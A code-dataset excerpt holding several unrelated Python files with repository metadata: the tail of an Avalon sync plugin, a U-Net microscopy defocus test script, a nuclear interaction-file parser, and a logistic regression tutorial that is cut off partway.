temp_dict["_hierarchical"] = hier_mongo_id_configuration_id
hier_mongo_id_configuration_id = temp_dict.get("_hierarchical")
if hier_mongo_id_configuration_id is not None:
return hier_mongo_id_configuration_id
# Legacy part for cases that MongoID attribute is per entity type.
entity_type = ent_info["entity_type"]
mongo_id_configuration_id = temp_dict.get(entity_type)
if mongo_id_configuration_id is not None:
return mongo_id_configuration_id
for attr in cust_attrs:
key = attr["key"]
if key != CUST_ATTR_ID_KEY:
continue
if attr["entity_type"] != ent_info["entityType"]:
continue
if (
ent_info["entityType"] == "task" and
attr["object_type_id"] != ent_info["objectTypeId"]
):
continue
mongo_id_configuration_id = attr["id"]
break
temp_dict[entity_type] = mongo_id_configuration_id
return mongo_id_configuration_id
def register(session, plugins_presets):
'''Register plugin. Called when used as an plugin.'''
SyncToAvalonEvent(session, plugins_presets).register()
| 37.347481
| 79
| 0.530052
|
77ffc0b91655fc773614ec3d6f7cd5d255460bca
| 15,071
|
py
|
Python
|
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
test_angle_file/test_single_example.py
|
Chenli235/AngleCorrection_Unet
|
49fb2eba653c20d6299902e73d6b1a8c42ad50ca
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 25 09:40:42 2021
@author: chen li
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from model import Unet_defocus
import skimage.io
import skimage.transform
import skimage.color
import skimage
import logging
import scipy.misc
import scipy.stats
import matplotlib.pyplot as plt
import scipy as sp
import scipy.ndimage
import heapq
import matplotlib.pyplot as plt
import matplotlib as mpl
from matplotlib import cm
import scipy.io as io
from PIL import Image
from utils import *
import time
logging.getLogger().setLevel(logging.DEBUG)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
image_size = 512
def draw_trainloss():
file = open('results/GAN_20210728-204833/train_losses.txt')
value = []
while 1:
lines = file.readlines(10000)
if not lines:
break
for line in lines:
value.append(float(line))
pass
file.close()
plt.plot(np.array(value))
def cal_certainty(prob):
sum_prob = np.sum(prob)
num_classes = prob.shape[0]
if sum_prob > 0:
normalized_prob = prob/sum_prob
certain_pro = 1.0 - scipy.stats.entropy(normalized_prob.flatten())/np.log(num_classes)
else:
certain_pro = 0
return certain_pro
def test_one_image_512():
model_path = 'results/GAN_20210728-204833/net_500.pt'
classes_num = 13
model = Unet_defocus(2,classes_num).to(device)
model.load_state_dict(torch.load(model_path))
# image size need to be 512
img1_path = 'test_images/906_32_1.tiff'
img2_path = 'test_images/906_32_2.tiff'
image_1 = skimage.io.imread(img1_path)
image_2 = skimage.io.imread(img2_path)
image_1[image_1>10000] = 10000
image_2[image_2>10000] = 10000
img = np.dstack((image_1,image_2)).astype(np.float32)
img = np.expand_dims(img,axis = 0)
img = img/10000.0
img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2).contiguous().to(device)
with torch.no_grad():
model.eval()
output = model(img)
#probs = F.softmax(output,dim=1)
probs = F.softmax(output,dim=1).cpu().detach().numpy()
#pred = torch.argmax(probs,dim=1).cpu().detach().numpy()
# cert = np.zeros((512,512))
# for i in range(output.shape[2]):
# for j in range(output.shape[3]):
# cert[i,j] = cal_certainty(prob[0,:,i,j])
pred = output.argmax(dim=1,keepdim=True).cpu().detach().numpy()
print(output.shape)
prediction_img = np.zeros((512,512))
source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
for i in range(output.shape[2]):
for j in range(output.shape[3]):
# background value set to 100
if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
prediction_img[i,j] = 100 # meaning the pixel belongs to background
else:
#prob = probs[0,:,i,j]
#max_index = heapq.nlargest(3, range(len(prob)), prob.take)
#pred_defocus_level = sum(prob[max_index]/sum(prob[max_index])*max_index)
prediction_img[i,j] = pred[0,0,i,j]
return prediction_img
def pred_convert_img(pred_img):
img = np.zeros((pred_img.shape[0],pred_img.shape[1],3))
for i in range(pred_img.shape[0]):
for j in range(pred_img.shape[1]):
if pred_img[i,j] == 100:
continue
else:
img[i,j,:] = get_class_rgb(pred_img[i,j])
return img
def generate_colorbar():
fig, ax = plt.subplots(figsize=(1, 6))
fig.subplots_adjust(bottom=0.5)
cmap = mpl.cm.rainbow
norm = mpl.colors.Normalize(vmin=0.0, vmax=1.0)
cb1 = mpl.colorbar.ColorbarBase(ax, cmap=cmap,
norm=norm,
orientation='horizontal',ticks=[])
#cb1.set_label('Some Units')
fig.show()
return cb1
def generate_defocus_color(predict_img):
img = np.zeros((predict_img.shape[1],predict_img.shape[1],3))
rainbow = plt.get_cmap('rainbow')
#draw pixel value one by one
for i in range(predict_img.shape[0]):
for j in range(predict_img.shape[1]):
if predict_img[i,j] == 100:
pass
else:
rgba = rainbow(predict_img[i,j])
for channel in range(3):
img[i,j,channel] = rgba[channel]
return img
def test_one_image_1024():
model_path = 'results/GAN_20210728-204833/net_500.pt'
classes_num = 13
model = Unet_defocus(2,classes_num).to(device)
model.load_state_dict(torch.load(model_path))
img1_path = "test_images/961898_anglecorrection_GalvoX_0.14977_GalvoY_0.047227_GalvoRoll_-0.019153_detectionlens_-0.0043_1.tiff"
img2_path = "test_images/961898_anglecorrection_GalvoX_0.14977_GalvoY_0.047227_GalvoRoll_-0.019153_detectionlens_-0.0043_2.tiff"
start = time.time()
image_1 = skimage.io.imread(img1_path)
image_2 = skimage.io.imread(img2_path)
image_1[image_1>10000] = 10000
image_2[image_2>10000] = 10000
image_1 = image_1[1324-512:1324+512,1324-512:1324+512]
image_2 = image_2[1324-512:1324+512,1324-512:1324+512]
#image_1 = image_1[:,::-1]
#image_2 = image_2[:,::-1]
img = np.dstack((image_1,image_2)).astype(np.float32)
img = np.expand_dims(img,axis = 0)
img = img/10000.0
img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
output = torch.zeros(1,13,1024,1024)
pred = np.zeros((1,1,10242,1024))
with torch.no_grad():
model.eval()
for i in range(1024//512):
for j in range(1024//512):
img_ = img[:,:,i*512:i*512+512,j*512:j*512+512].contiguous().to(device)
output[:,:,i*512:i*512+512,j*512:j*512+512] = model(img_)
pred[:,:,i*512:i*512+512,j*512:j*512+512] = output[:,:,i*512:i*512+512,j*512:j*512+512].argmax(dim=1,keepdim=True).cpu().detach().numpy()
probs = F.softmax(output,dim=1).cpu().detach().numpy()
prediction_img = np.zeros((1024,1024))
source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
for i in range(output.shape[2]):
for j in range(output.shape[3]):
# background value set to 100
if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
prediction_img[i,j] = 100 # meaning the pixel belongs to background
else:
#prob = probs[0,:,i,j]
prediction_img[i,j] = pred[0,0,i,j]
end = time.time()
print(end-start)
return prediction_img
def cal_certainty_fast(probs):
sum_probs = np.sum(probs,axis = 1)
normalized_probs = probs/sum_probs
cert_img = 1 - scipy.stats.entropy(normalized_probs,axis = 1)/np.log(13)
return cert_img.squeeze()
def test_one_image_1024_fast():
model_path = 'results/GAN_20210728-204833/net_500.pt'
classes_num = 13
model = Unet_defocus(2,classes_num).to(device)
model.load_state_dict(torch.load(model_path))
img1_path = "test_images_new/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_1.tiff"
img2_path = "test_images_new/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_2.tiff"
start = time.time()
image_1 = skimage.io.imread(img1_path)
image_2 = skimage.io.imread(img2_path)
image_1[image_1>10000] = 10000
image_2[image_2>10000] = 10000
image_1 = image_1[1024-512:1024+512,1024-512:1024+512]
image_2 = image_2[1024-512:1024+512,1024-512:1024+512]
#image_1 = image_1[:,::-1]
#image_2 = image_2[:,::-1]
img = np.dstack((image_1,image_2)).astype(np.float32)
img = np.expand_dims(img,axis = 0)
img = img/10000.0
img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
output = torch.zeros(1,13,1024,1024)
pred = np.zeros((1,1,1024,1024))
with torch.no_grad():
model.eval()
for i in range(1024//512):
for j in range(1024//512):
img_ = img[:,:,i*512:i*512+512,j*512:j*512+512].contiguous().to(device)
output[:,:,i*512:i*512+512,j*512:j*512+512] = model(img_)
pred[:,:,i*512:i*512+512,j*512:j*512+512] = output[:,:,i*512:i*512+512,j*512:j*512+512].argmax(dim=1,keepdim=True).cpu().detach().numpy()
probs = F.softmax(output,dim=1).cpu().detach().numpy()
prediction_img = np.zeros((1024,1024))
prediction_img = pred[0,0,:,:]
source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
cert_img = cal_certainty_fast(probs)
print(cert_img.squeeze().shape)
print(source_img.shape)
print(cert_img.shape)
prediction_img[source_img<=300] = 100
prediction_img[cert_img<=0.3] = 100
# for i in range(output.shape[2]):
# for j in range(output.shape[3]):
# # background value set to 100
# if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
# prediction_img[i,j] = 100 # meaning the pixel belongs to background
# else:
# #prob = probs[0,:,i,j]
# prediction_img[i,j] = pred[0,0,i,j]
end = time.time()
print(end-start)
return prediction_img
def test_one_image_512_fast():
model_path = 'results/GAN_20210728-204833/net_500.pt'
classes_num = 13
model = Unet_defocus(2,classes_num).to(device)
model.load_state_dict(torch.load(model_path))
img1_path = "test_images/961898_original_GalvoX_0.18516_GalvoY_-0.053165_GalvoRoll_-0.034161_detectionlens_-0.0044_1.tiff"
img2_path = "test_images/961898_original_GalvoX_0.18516_GalvoY_-0.053165_GalvoRoll_-0.034161_detectionlens_-0.0044_2.tiff"
start = time.time()
image_1 = skimage.io.imread(img1_path)
image_2 = skimage.io.imread(img2_path)
image_1[image_1>10000] = 10000
image_2[image_2>10000] = 10000
image_1 = image_1[1260-256:1260+256,1260-256:1260+256]
image_2 = image_2[1260-256:1260+256,1260-256:1260+256]
img = np.dstack((image_1,image_2)).astype(np.float32)
img = np.expand_dims(img,axis = 0)
img = img/10000.0
img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
output = torch.zeros(1,13,1024,1024)
pred = np.zeros((1,1,1024,1024))
with torch.no_grad():
model.eval()
img_ = img.contiguous().to(device)
output = model(img_)
pred = output.argmax(dim=1,keepdim=True).cpu().detach().numpy()
probs = F.softmax(output,dim=1).cpu().detach().numpy()
prediction_img = np.zeros((512,512))
prediction_img = pred[0,0,:,:]
source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
cert_img = cal_certainty_fast(probs)
print(cert_img.squeeze().shape)
print(source_img.shape)
print(cert_img.shape)
prediction_img[source_img<=300] = 100
prediction_img[cert_img<=0.3] = 100
# for i in range(output.shape[2]):
# for j in range(output.shape[3]):
# # background value set to 100
# if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
# prediction_img[i,j] = 100 # meaning the pixel belongs to background
# else:
# #prob = probs[0,:,i,j]
# prediction_img[i,j] = pred[0,0,i,j]
end = time.time()
print(end-start)
return prediction_img
def test_one_image_2048():
model_path = 'results/GAN_20210728-204833/net_500.pt'
classes_num = 13
model = Unet_defocus(2,classes_num).to(device)
model.load_state_dict(torch.load(model_path))
img1_path = "test_images/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_1.tiff"
img2_path = "test_images/157613_defocuscorrection_GalvoX_0.054839_GalvoY_0.3165_GalvoRoll_0.0073971_detectionlens_0.01979_2.tiff"
image_1 = skimage.io.imread(img1_path)
image_2 = skimage.io.imread(img2_path)
image_1[image_1>10000] = 10000
image_2[image_2>10000] = 10000
img = np.dstack((image_1,image_2)).astype(np.float32)
img = np.expand_dims(img,axis = 0)
img = img/10000.0
img = torch.from_numpy(img.copy()).type(torch.FloatTensor).permute(0,3,1,2)
output = torch.zeros(1,13,2048,2048)
pred = np.zeros((1,1,2048,2048))
with torch.no_grad():
model.eval()
for i in range(2048//512):
for j in range(2048//512):
img_ = img[:,:,i*512:i*512+512,j*512:j*512+512].contiguous().to(device)
output[:,:,i*512:i*512+512,j*512:j*512+512] = model(img_)
pred[:,:,i*512:i*512+512,j*512:j*512+512] = output[:,:,i*512:i*512+512,j*512:j*512+512].argmax(dim=1,keepdim=True).cpu().detach().numpy()
probs = F.softmax(output,dim=1).cpu().detach().numpy()
prediction_img = np.zeros((2048,2048))
source_img = sp.ndimage.filters.gaussian_filter(image_1,[1,1],mode = 'reflect')
for i in range(output.shape[2]):
for j in range(output.shape[3]):
# background value set to 100
if source_img[i,j]<=300 or cal_certainty(probs[0,:,i,j])<0.3:
prediction_img[i,j] = 100 # meaning the pixel belongs to background
else:
#prob = probs[0,:,i,j]
prediction_img[i,j] = pred[0,0,i,j]
#max_index = heapq.nlargest(3, range(len(prob)), prob.take)
#pred_defocus_level = sum(prob[max_index]/sum(prob[max_index])*max_index)
#prediction_img[i,j] = (pred_defocus_level)/12
return prediction_img
if __name__ == "__main__":
# pred_img = test_one_image_512()
# img_defocus = pred_convert_img(pred_img)
# plt.imsave('defocus_img.tiff',img_defocus)
# img_defocus = generate_defocus_color(pred_img)
# plt.imsave('defocus_img.tiff',img_defocus)
# pred_img = test_one_image_2048()
# img_defocus = generate_defocus_color(pred_img)
# plt.imsave('defocus_img.tiff',img_defocus)
# Image.fromarray(pred_img).save('pred_img.tif')
pred_img = test_one_image_1024_fast()
img_defocus = pred_convert_img(pred_img)
plt.imsave('defocus_img.tiff',img_defocus)
| 41.065395
| 154
| 0.613562
|
e11a0f4aeeb952c2b8f7cc3c68152d9fe134557c
| 15,215
|
py
|
Python
|
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | 1
|
2016-07-20T08:47:27.000Z
|
2016-07-20T08:47:27.000Z
|
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | null | null | null |
src/deprecated/int/parser.py
|
dilynfullerton/tr-A_dependence_plots
|
4a03664f1cc9552787bd9cb39d1409b507f10777
|
[
"CC0-1.0"
] | null | null | null |
"""int/parser.py
Functions for parsing interaction files and extracting information from
their file names
"""
from __future__ import print_function
from parse import get_files_r, filename_elts_list, elt_from_felts
from parse import content_lines, comment_lines
from constants import FN_PARSE_INT_ELT_SPLIT as ELT_SPLIT
from constants import FN_PARSE_INT_RGX_BASE as REGEX_BASE
from constants import FN_PARSE_INT_RGX_E as REGEX_E
from constants import FN_PARSE_INT_RGX_HW as REGEX_HW
from constants import FN_PARSE_INT_RGX_MASS as REGEX_MASS
from constants import FN_PARSE_INT_RGX_NAME as REGEX_NAME
from constants import FN_PARSE_INT_RGX_RP as REGEX_RP
from constants import F_PARSE_INT_CMNT_INDEX as CMNT_INDEX
from constants import F_PARSE_INT_CMNT_ZBT as CMNT_ZBT
from constants import F_PARSE_INT_COL_START_ORBITAL as COL_START_ORBITAL
from constants import F_PARSE_INT_NCOLS_ORBITALS as NCOLS_ORBITALS
from constants import F_PARSE_INT_ROW_SPE as ROW_SPE
from constants import F_PARSE_INT_CMNT_STR as CMNT_STR
# ............................................................
# File name parsing
# ............................................................
def e_level_from_filename(filename, split_char=ELT_SPLIT,
e_regex=REGEX_E):
"""Gets the e_max truncation number from the file name.
Assumes files are named accoding to the convention:
..._[...]_e[e-level]_[...]_...
Also assumes that the name element containing th e-level is the last
element which begins with an e.
Returns None if not found.
:param filename: the name of the file
:param split_char: the character with which filename elements are separated
:param e_regex: the regex that fully matches the element with e
"""
return _e_from_felts(
filename_elts_list(filename, split_char), e_regex)
def _e_from_felts(felts, e_regex):
e = elt_from_felts(felts, e_regex)
return int(e[1:]) if e is not None else None
def hw_from_filename(filename, split_char=ELT_SPLIT,
hw_regex=REGEX_HW):
"""Gets the hw frequency number from the file name. Returns None if not
found.
+ Assumes files are named according to the convention:
..._[...]_hw[hw number]_[...]_...
+ Assumes that the instance of the string 'hw' in the beginning of the
element containing the number is the last instance of such that begins
an element.
:param filename: the name of the file
:param split_char: the character with which filename elements are separated
:param hw_regex: the regex that fully matches the element with hw
"""
return _hw_from_felts(
filename_elts_list(filename, split_char), hw_regex)
def _hw_from_felts(felts, hw_regex):
hw = elt_from_felts(felts, hw_regex)
return int(hw[2:]) if hw is not None else None
def base_from_filename(filename, split_char=ELT_SPLIT,
base_regex=REGEX_BASE):
"""Gets the base A-number (that normal-ordering was done WRT)
from the filename.
Assumes that the base number is the first element (from left to right) that
will be matched by the base_regex.
:param filename: the name of the file
:param split_char: the character that separates file elements
:param base_regex: the regular expression which will entirely match the
element
:return: the integer value of the base or None, if not found
"""
return _base_from_felts(
filename_elts_list(filename, split_char), base_regex)
def _base_from_felts(felts, base_regex):
b = elt_from_felts(felts, base_regex)
return int(b[1:]) if b is not None else None
def rp_from_filename(filename, split_char=ELT_SPLIT,
rp_regex=REGEX_RP):
"""Gets the Rp (proton radius?) label from the file name, returns None if
not found.
:param filename: the name of the file to parse
:param split_char: the character which separates filename elements
:param rp_regex: the regex that fully matches the rp element
:return: the Rp (integer) label, if found, otherwise returns None
"""
return _rp_from_felts(
reversed(filename_elts_list(filename, split_char)), rp_regex)
def _rp_from_felts(felts, rp_regex):
rp = elt_from_felts(felts, rp_regex)
return int(rp[rp.find('Rp')+2]) if rp is not None else None
def mass_number_from_filename(filename, split_char=ELT_SPLIT,
mass_regex=REGEX_MASS):
"""Gets the mass number from the file name. Assumes files are named
according to the convention *A[mass number][file extension]
:param filename: the filename from which to get the mass number
:param split_char: the character that separates name elements
:param mass_regex: the regex that fully matches the mass element
"""
filename_elts = reversed(filename_elts_list(filename, split_char))
mass = elt_from_felts(filename_elts, mass_regex)
return int(mass[1:]) if mass is not None else None
def name_from_filename(filename, split_char=ELT_SPLIT,
name_regex=REGEX_NAME):
"""Gets the method name (e.g. magnus) from the filename.
Assumes that the name is the first element (from left to right) that will
be entirely matched by name_regex
:param filename: the name of the data file
:param split_char: the split character for name
:param name_regex: the regular expression which should be entirely matched
by the name
:return: name
"""
felts_list = filename_elts_list(filename, split_char)
return elt_from_felts(felts_list, name_regex)
def exp(filename, split_char=ELT_SPLIT, e_regex=REGEX_E, hw_regex=REGEX_HW,
b_regex=REGEX_BASE, rp_regex=REGEX_RP):
"""Returns a 4-tuple representing the exp (see int/ExpInt.py)
:param filename: name of the interaction file
:param split_char: character that separates filename elements
:param e_regex: regular expression that matches the e_max element
:param hw_regex: regular expression that matches the hw element
:param b_regex: regular expression that matches the normal ordering element
:param rp_regex: regular expression that matches the rp element
:return: (emax, hw, b, rp)
"""
felts = filename_elts_list(filename, split_char)
return (_e_from_felts(felts, e_regex), _hw_from_felts(felts, hw_regex),
_base_from_felts(felts, b_regex), _rp_from_felts(felts, rp_regex))
# ............................................................
# File content parsing
# ............................................................
# todo: Some of this could be done a lot better
def index_lines(commnt_lines, index_comment=CMNT_INDEX):
"""From the set of comment lines taken from a data file, returns the
lines that relate the orbital indices to their quantum numbers. Assumes
these lines always occur at the end of the commented section and are
directly preceded with a line beginning with the word "Index"
:param commnt_lines: lines commented out
:param index_comment: comment string that indicates the start of the
index -> orbital key
"""
start_index = -1
for cl, index in zip(commnt_lines, range(len(commnt_lines) + 1)):
if cl.find(index_comment) == 0:
start_index = index + 1
break
return list(commnt_lines)[start_index:]
def zero_body_term_line(cmnt_lines, zbt_comment=CMNT_ZBT):
"""From the set of comment lines taken from a data file, returns the line
that tells the zero body term.
:param cmnt_lines: lines that are comments in the data file
:param zbt_comment: the descriptive flag that indicates that the given line
is the zero body term line
:return: The zero body term line, as a string
"""
for cl in reversed(list(cmnt_lines)):
if cl.find(zbt_comment) == 0:
return cl
else:
return None
def zero_body_term(zbt_line):
if zbt_line is not None:
return float(zbt_line.split(':')[1].strip())
else:
return None
def spe_list(lines, spe_line_pos=ROW_SPE):
"""Returns the line containing the header in the form of an list
:param spe_line_pos: position of the SPE line WRT to non-empty,
non-comment lines
:param lines: content lines
"""
header_line = lines[spe_line_pos]
return header_line.split()
def tbme_data_array(lines, interaction_start=ROW_SPE + 1):
"""Returns the lines containing the interaction data in the form of an
array (list of lists)
:param lines: file content lines
:param interaction_start: position of first TBME with respect to
non-empty, non-commented file lines
"""
data_lines = lines[interaction_start:]
for i in range(len(data_lines)):
data_lines[i] = data_lines[i].split()
return data_lines
def orbital_energies(
spe_line_items_list, start_index=COL_START_ORBITAL,
num_orbitals=NCOLS_ORBITALS
):
"""Returns the orbital energies from the given header list
:param num_orbitals: number of orbitals for which to gather lines
:param start_index: position of first SPE in SPE line
:param spe_line_items_list: list of split items in SPE line
"""
return spe_line_items_list[start_index: start_index + num_orbitals]
def other_constants(
spe_line_items_list, start_index=COL_START_ORBITAL,
num_orbitals=NCOLS_ORBITALS
):
"""Return the other values in the header items list, following the SPE's
:param spe_line_items_list: list of items in the SPE line
:param start_index: index of first SPE in line
:param num_orbitals: number of SPE's
"""
return spe_line_items_list[start_index + num_orbitals:]
def orbital_energies_from_filename(filepath):
"""Returns the orbital energies from the given filename through
functional composition
:param filepath: path to the file
"""
return orbital_energies(spe_list(
lines=list(content_lines(filepath, CMNT_STR))))
def other_constants_from_filename(filepath):
"""Given a filename, returns all of the items in the header items list
following the orbital energies
:param filepath: path to the file
"""
return other_constants(spe_list(
lines=list(content_lines(filepath, CMNT_STR))))
# ............................................................
# Map construction
# ............................................................
def index_map(idx_lines):
"""Returns a map from the orbital index to its descriptive quantum
numbers
:param idx_lines: lines defining the index -> orbital key
"""
idx_map = dict()
for line in idx_lines:
row = line.split()
row[0] = int(row[0])
idx_map[row[0]] = tuple(row[1:])
return idx_map
def index_to_qnums_map(fpath):
"""Given a data file name, gets the mapping from orbital index to
(n, l, j, tz) tuple
:param fpath: path to the file
"""
return index_map(index_lines(commnt_lines=comment_lines(fpath, CMNT_STR)))
def mass_spe_data_map(dpath, filterfn=lambda x: True, fpath_list=None):
"""Returns a map from mass number to orbital energy arrays
:param dpath: the directory which is a direct parent to the files to use
:param filterfn: the function to use to filter the file names in the
directory
:param fpath_list: relevant file paths
"""
if fpath_list is None:
fpath_list = get_files_r(dpath, filterfn)
d = dict()
for f in fpath_list:
mass_number = mass_number_from_filename(f)
orbital_energies_list = orbital_energies_from_filename(f)
d[mass_number] = orbital_energies_list
return d
def mass_to_index_to_energy_map(dpath, filterfn=lambda x: True,
fpath_list=None):
"""Given a directory, creates a mapping
mass number -> (index -> energy)
using the files in that directory
:param fpath_list:
:param dpath: the directory that is a direct parent to the files from
which the map is to be constructed
:param filterfn: the filter to apply to the files prior to constructing the
map
"""
mea_map = mass_spe_data_map(dpath, filterfn, fpath_list)
for k in mea_map.keys():
v = mea_map[k]
nextv = dict()
for i in range(1, 1 + len(v)):
nextv[i] = float(v[i - 1])
mea_map[k] = nextv
return mea_map
def _mass_tbme_data_map(dpath, filterfn=lambda x: True, fpath_list=None):
"""Creates a mapping from mass number to an array of interaction data
for each file in the directory
"""
if fpath_list is None:
fpath_list = get_files_r(dpath, filterfn)
mida_map = dict()
for f in fpath_list:
mass_number = mass_number_from_filename(f)
ida = tbme_data_array(lines=list(content_lines(f, CMNT_STR)))
mida_map[mass_number] = ida
return mida_map
def mass_to_tbint_to_energy_map(dpath, filterfn=lambda x: True,
fpath_list=None):
"""Given a directory, creates a mapping
mass number -> ( a, b, c, d, j -> energy )
using the files in the directory
:param fpath_list:
:param dpath: the directory which is a direct parent to the files from
which to generate the map
:param filterfn: the filter function to apply to the files before
constructing the map
"""
mida_map = _mass_tbme_data_map(
dpath, filterfn, fpath_list)
for k in mida_map.keys():
v = mida_map[k]
nextv = dict()
for row in v:
tup = tuple(row[0:6])
energy = float(row[6])
nextv[tup] = energy
mida_map[k] = nextv
return mida_map
def mass_to_zbt_map(dpath, filterfn=lambda x: True, fpath_list=None):
"""Given a directory, creates a mapping
mass -> zero body term
using the files in the directory
:param dpath: the directory that is a direct parent to the files from
which to construct the map
:param filterfn: the filter to apply to the files before constructing the
map
:param fpath_list: filepaths from which to gather data. If None, looks
in whole directory
"""
if fpath_list is None:
fpath_list = get_files_r(dpath, filterfn)
mzbt_map = dict()
for f in fpath_list:
mass_number = mass_number_from_filename(f)
zbt = zero_body_term(
zero_body_term_line(cmnt_lines=comment_lines(f, CMNT_STR)))
mzbt_map[mass_number] = zbt
return mzbt_map
def mass_other_constants_map(dpath, filterfn=lambda x: True, fpath_list=None):
"""Given a directory, creates a mapping from mass number to the other
constants following the orbital energies in the first line of data
:param dpath: main directory
:param filterfn: filter to apply to files before constructing the map
:param fpath_list: if not None, this is used instead of getting files
in the directory
"""
if fpath_list is None:
fpath_list = get_files_r(dpath, filterfn)
moc_map = dict()
for f in fpath_list:
mass_number = mass_number_from_filename(f)
oc = other_constants_from_filename(f)
moc_map[mass_number] = oc
return moc_map
| 38.0375
| 79
| 0.689648
|
1c714f257594d11da3f3823cb431af1b03347fa6
| 4,637
|
py
|
Python
|
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
LogisticRegression/lr.py
|
Marticles/ml-in-action
|
7b8a13fdd73a210ee4338dce400bd764eb9abf75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
# 《机器学习实战》 - 第5章 - Logistic回归
# 示例1:采用梯度上升法找到Logistic回归分类器的最佳回归系数
def loadDataSet():
"""
读取数据集
"""
dataMat = []
labelMat = []
fr = open('TestSet.txt')
for line in fr.readlines():
lineArr = line.strip().split()
# X0设为1.0
dataMat.append([1.0,float(lineArr[0]),float(lineArr[1])])
labelMat.append(int(lineArr[2]))
return dataMat,labelMat
def sigmoid(z):
"""
sigmoid函数
"""
return 1.0 / (1 + np.exp(-z))
def gradAscent(dataMatIn, classLabels):
"""
梯度上升法
"""
dataMatrix = np.mat(dataMatIn)
# 转置为列向量
labelMat = np.mat(classLabels).transpose()
m, n = np.shape(dataMatrix)
alpha = 0.001 # 学习率
maxCycles = 500 # 迭代次数
weights = np.ones((n,1)) # 权重
for k in range(maxCycles):
h = sigmoid(dataMatrix * weights)
error = labelMat - h
weights = weights + alpha * dataMatrix.transpose() * error
return weights
# 测试结果
# dataArr, labelMat = loadDataSet()
# print(gradAscent(dataArr,labelMat))
def stoGradAscent0(dataMatrix, classLabels):
"""
随机梯度下降法
"""
dataMatrix = np.array(dataMatrix)
m, n = np.shape(dataMatrix)
alpha = 0.001
weights = np.ones(n)
for i in range(m):
h = sigmoid(sum(dataMatrix[i] * weights))
error = classLabels[i] - h
weights = weights + alpha * dataMatrix[i]* error
return weights
def stocGradAscent1(dataMatrix, classLabels, numIter = 150):
"""
改进的随机梯度下降法
"""
dataMatrix = np.array(dataMatrix)
m, n = np.shape(dataMatrix)
weights = np.ones(n)
# i和j的不断增大令学习率不断减少,但是不为0
for j in range(numIter):
dataIndex = list(range(m))
for i in range(m):
alpha = 4/(1.0+j+i)+0.0001
# 随机抽取样本
randIndex = int(np.random.uniform(0,len(dataIndex)))
h = sigmoid(sum(dataMatrix[randIndex]*weights))
error = classLabels[randIndex] - h
weights = weights + alpha * error * dataMatrix[randIndex]
del(dataIndex[randIndex])
return weights
def plotBestFit(wei):
"""
对结果进行可视化
"""
# weights = wei.getA() # getA()方法将numpy矩阵转为数组
weights = wei
dataMat, labelMat = loadDataSet()
dataArr = np.array(dataMat)
n = np.shape(dataArr)[0]
xcord1 = []
ycord1 = []
xcord2 = []
ycord2 = []
for i in range(n):
if int(labelMat[i]) == 1:
xcord1.append(dataArr[i,1])
ycord1.append(dataArr[i,2])
else:
xcord2.append(dataArr[i,1])
ycord2.append(dataArr[i,2])
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(xcord1, ycord1, s = 30, marker = 's')
ax.scatter(xcord2, ycord2, s = 30,)
x = np.arange(-3.0, 3.0, 0.1)
y = (-weights[0] - weights[1] * x) / weights[2]
ax.plot(x, y, c = 'red')
plt.xlabel(('X1'))
plt.ylabel(('Y1'))
plt.show()
# 可视化
# dataArr, labelMat = loadDataSet()
# plotBestFit(stocGradAscent1(dataArr,labelMat))
# 示例2: 从疝气病症预测病马的死亡率
def classifyVector(inX, weights):
"""
sigmoid分类器
根据权重与特征来计算sigmoid的值,大于0.5返回1,否则返回0
"""
prob = sigmoid(sum(inX*weights))
if prob > 0.5:
return 1.0
else:
return 0.0
def colicTest():
"""
在疝气病马数据集中测试分类效果
"""
frTrain = open('HorseColicTraining.txt')
frTest = open('HorseColicTest.txt')
trainingSet = []
trainingLabels = []
# 在训练集上训练
for line in frTrain.readlines():
currLine = line.strip().split('\t')
lineArr = []
for i in range(21):
lineArr.append(float(currLine[i]))
trainingSet.append(lineArr)
trainingLabels.append(float(currLine[21]))
trainWeights = stocGradAscent1(np.array(trainingSet), trainingLabels, 500)
errorCount = 0
numTestVec = 0.0
# 在测试集上进行测试
for line in frTest.readlines():
numTestVec += 1.0
currLine = line.strip().split('\t')
lineArr = []
for i in range(21):
lineArr.append(float(currLine[i]))
